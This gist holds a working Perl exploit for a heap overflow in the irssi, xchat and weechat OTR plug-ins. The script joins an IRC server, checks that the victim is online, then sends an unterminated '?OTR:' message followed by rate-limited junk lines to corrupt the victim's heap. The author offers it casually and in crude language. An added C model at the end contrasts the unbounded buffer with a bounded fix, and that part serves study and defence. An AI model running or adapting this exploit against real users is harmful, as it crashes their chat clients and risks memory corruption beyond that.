@compoterhacker
Created March 9, 2016 21:25
old ass irssi-otr heap exploit

OLD ASS nonsense, but in the spirit of hacking otr...

irssi-otr, xchat-otr and weechat-otr contain a heap corruption vulnerability, triggered when a PRIVMSG that starts with "?OTR:" is sent to a victim without a terminating character such as "." or ",". The plug-in then treats the message as the first fragment of a very long OTR message and sits waiting for the rest to arrive, looking for the "." or "," terminator, which never comes.

This lets us feed a junkshot 440 chars at a time via PM: every line is appended to the pending message buffer, which eventually overflows and corrupts heap memory.

PoC works, but I don't really give a fuck about this bug because no one uses this shit.

#!/usr/bin/perl
#
# irssi/xchat/weechat-otr plugin heap overflow PoC
# no one uses this shit so whatever
#
use strict;
use warnings;
use IO::Socket;

system('clear');
print " __ __[irssi + xchat]__ \r\n";
print " _\\ \\\\ \\__ [otr] /'_ `\\ \r\n";
print "/\\__ _ _\\ ______/\\ \\L\\ \\\r\n";
print "\\/_L\\ \\\\ \\L_/\\ '__`\\ \\___, \\\r\n";
print " /\\_ _ _\\ \\ \\L\\ \\/__,/\\ \\ \r\n";
print " \\/_/\\_\\\\_\\/\\ \\ ,__/ \\ \\_\\\r\n";
print " \\/_//_/ \\ \\ \\/[heap]\\/_/\r\n";
print " [remote] \\ \\_\\[poop] \r\n";
print " \\/_/ \r\n";

if (@ARGV != 2) {
    die "[-] Usage: perl $0 <server> <target>\n";
}
my $server   = $ARGV[0];
my $nickname = "pewpew";
my $username = "imgay";
my $target   = $ARGV[1];
my $line;

# Slicing up the junkshot into different chars makes it not look like a flood,
# which seemed to be a problem on Unreal w/irssi.
my $buf = 'A'x1178 . 'B'x1178 . 'C'x1178 . 'D'x1178 . 'A'x1178 . 'B'x1178 . 'C'x1178;
$buf .= 'D'x1178;
#my $buff = 'A'x9424;
# Note: inside single quotes '\xff' is the literal four characters \ x f f, not a
# 0xff byte. Swap in "\xff" (double quotes) if you want raw 0xff bytes on the wire.
my $junkshot = $buf . '\xff'x7;

my $sock = IO::Socket::INET->new(
    PeerAddr => $server,
    PeerPort => 6667,
    Proto    => 'tcp',
) or die "[-] Could not connect to $server port 6667: $!\n";

# Register right away (not every ircd sends "NOTICE AUTH" first), then wait for
# either the registration PING or RPL_WELCOME (001) before going on.
print $sock "NICK $nickname\r\nUSER $username 0 0 :kindsoul\r\n";
while ($line = <$sock>) {
    if ($line =~ /^PING\s*:?(\S+)/) {
        print $sock "PONG :$1\r\n";
        last;
    }
    last if $line =~ /^\S+ 001 /;   # registered without a PING; carry on
}

print "[+] Connected to $server, seeing if $target is alive and ready to receive...\n";
print $sock "WHOIS $target\r\n";
while ($line = <$sock>) {
    print $sock "PONG :$1\r\n" if $line =~ /^PING\s*:?(\S+)/;  # keep the link alive
    # Anchor on the numeric reply so a "401"/"311" in the MOTD can't fool us.
    if ($line =~ /^\S+ 401 /) {
        die "\n[-] Target: $target not online. Aborting.\n\n";
    }
    elsif ($line =~ /^\S+ 311 /) {
        last;
    }
}

print "[+] All systems go, prepping $target for junkshot!\n";
print "[+] Junkshot must be rate-limited, so it'll take a few minutes...\n";
# Opening line: "?OTR:" with no "." or "," terminator, so the plug-in starts
# buffering and waits for a continuation that is never terminated.
my $front = substr($junkshot, 0, 435);
$junkshot = substr($junkshot, length($front));
print $sock "PRIVMSG $target :?OTR:$front"; # ending the OG junkshot with \n stops the crash...?
while ($junkshot) {
    $front = substr($junkshot, 0, 440);
    $junkshot = substr($junkshot, length($front));
    print $sock "PRIVMSG $target :$front\r\n";
    sleep 6; # rate limit, but victim won't even recv messages if plugin is loaded
             # (server PINGs are not answered during this loop; a very slow run can time out)
}
print "\n[+] Junkshot delivered!\n\n";
close $sock;
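What the script above is poking at, as an added example written for this page (it is not code from the gist or from any of the OTR plug-ins): a minimal model of the "append until a '.' or ',' shows up" reassembly with no bound, next to a version that caps the assembly and resets. Everything below is an assumption about the shape of the bug rather than the plug-ins' actual source: VULN_BUF_SIZE, OTR_MAX_MSG, the function names, and the constructed traffic in replay_poc, which mirrors the script's pattern (one ?OTR: line with no terminator, then 440-byte filler lines).

```c
/* Reassembly model for the "?OTR:" fragment bug described above: the
 * unchecked append pattern beside a bounded one.  Added example written for
 * this page, not the irssi-otr/xchat-otr/weechat-otr source; VULN_BUF_SIZE,
 * OTR_MAX_MSG and the function names are assumptions. */
#include <stdbool.h>
#include <string.h>

#define OTR_PREFIX     "?OTR:"
#define OTR_PREFIX_LEN 5
#define VULN_BUF_SIZE  1024  /* assumed size of the unchecked buffer     */
#define OTR_MAX_MSG    8192  /* assumed hard cap in the hardened version */
#define IRC_CHUNK      440   /* PRIVMSG payload the PoC sends per line   */

typedef enum { OTR_NONE, OTR_PARTIAL, OTR_COMPLETE, OTR_REJECTED } otr_status_t;

/* Complete when the text ends in '.' or ',' (the terminators the plug-in waits for). */
static bool otr_terminated(const char *s, size_t n)
{
    return n > 0 && (s[n - 1] == '.' || s[n - 1] == ',');
}

/* Vulnerable pattern: once a PRIVMSG starts with "?OTR:", every later line is
 * appended until a terminator arrives and nothing compares the running length
 * with the allocation.  The real bug memcpy()s every byte; this model copies
 * only what still fits (so it stays memory-safe) but keeps counting, so a
 * caller sees how far past VULN_BUF_SIZE the unchecked code would have gone. */
size_t vuln_feed(char *fixed, size_t *len, bool *pending, const char *msg)
{
    size_t n = strlen(msg);
    if (!*pending) {
        if (strncmp(msg, OTR_PREFIX, OTR_PREFIX_LEN) != 0) return *len;
        *pending = true, *len = 0;
    }
    size_t room = *len < VULN_BUF_SIZE ? VULN_BUF_SIZE - *len : 0;
    memcpy(fixed + VULN_BUF_SIZE - room, msg, n < room ? n : room); /* bug: memcpy(fixed + *len, msg, n) */
    *len += n;                                                      /* grows without bound */
    if (otr_terminated(msg, n)) *pending = false;
    return *len;
}

/* Hardened version: same state machine, but an assembly that would exceed
 * OTR_MAX_MSG is dropped and the state reset before anything is copied. */
typedef struct {
    char   buf[OTR_MAX_MSG + 1];
    size_t len;
    bool   pending;  /* waiting for a '.' or ',' terminator */
} otr_reasm_t;

otr_status_t otr_feed(otr_reasm_t *r, const char *msg)
{
    size_t n = strlen(msg);
    if (!r->pending) {
        if (strncmp(msg, OTR_PREFIX, OTR_PREFIX_LEN) != 0) return OTR_NONE;
        r->pending = true, r->len = 0;
    }
    if (n > OTR_MAX_MSG - r->len) {  /* overflow-safe form of len + n > cap */
        r->pending = false, r->len = 0;
        return OTR_REJECTED;
    }
    memcpy(r->buf + r->len, msg, n);
    r->len += n, r->buf[r->len] = '\0';
    if (!otr_terminated(r->buf, r->len)) return OTR_PARTIAL;
    r->pending = false;
    return OTR_COMPLETE;
}

/* Result of feeding one message to a fresh hardened reassembler. */
otr_status_t otr_single(const char *msg)
{
    otr_reasm_t r = {0};
    return otr_feed(&r, msg);
}

/* Replays the PoC's traffic shape against both versions: one "?OTR:" line
 * with no terminator, then `chunks` filler lines of IRC_CHUNK bytes (a
 * constructed stand-in for the script's A/B/C/D junkshot). */
typedef struct {
    size_t       unchecked_total;  /* bytes the unchecked code would write */
    otr_status_t hardened_status;  /* sticky once OTR_REJECTED is hit      */
    size_t       hardened_len;     /* bytes the hardened version holds     */
} poc_result_t;

poc_result_t replay_poc(size_t chunks)
{
    char line[IRC_CHUNK + 1] = {0}, fixed[VULN_BUF_SIZE];
    size_t vlen = 0;
    bool vpend = false;
    otr_reasm_t r = {0};
    poc_result_t res;
    memcpy(line, OTR_PREFIX, OTR_PREFIX_LEN);
    memset(line + OTR_PREFIX_LEN, 'A', IRC_CHUNK - OTR_PREFIX_LEN);
    vuln_feed(fixed, &vlen, &vpend, line);
    res.hardened_status = otr_feed(&r, line);
    memset(line, 'B', IRC_CHUNK);  /* no prefix, no terminator: reads as a continuation */
    for (size_t i = 0; i < chunks; i++) {
        vuln_feed(fixed, &vlen, &vpend, line);
        otr_status_t s = otr_feed(&r, line);
        if (res.hardened_status != OTR_REJECTED) res.hardened_status = s;
    }
    res.unchecked_total = vlen, res.hardened_len = r.len;
    return res;
}
```

replay_poc(21) mirrors the script's roughly 22 lines: the unchecked counter ends at 9680 bytes against a 1024-byte allocation, while the hardened reassembler refuses the 18th continuation (7920 + 440 would pass the 8192 cap) and resets to an empty state. The fix is the comparison before the memcpy plus the reset. A real plug-in should go further than this model and stop treating every later PRIVMSG as a continuation, for instance by dropping the pending state after a fragment count or timeout, since otherwise one unterminated "?OTR:" line keeps that state open indefinitely.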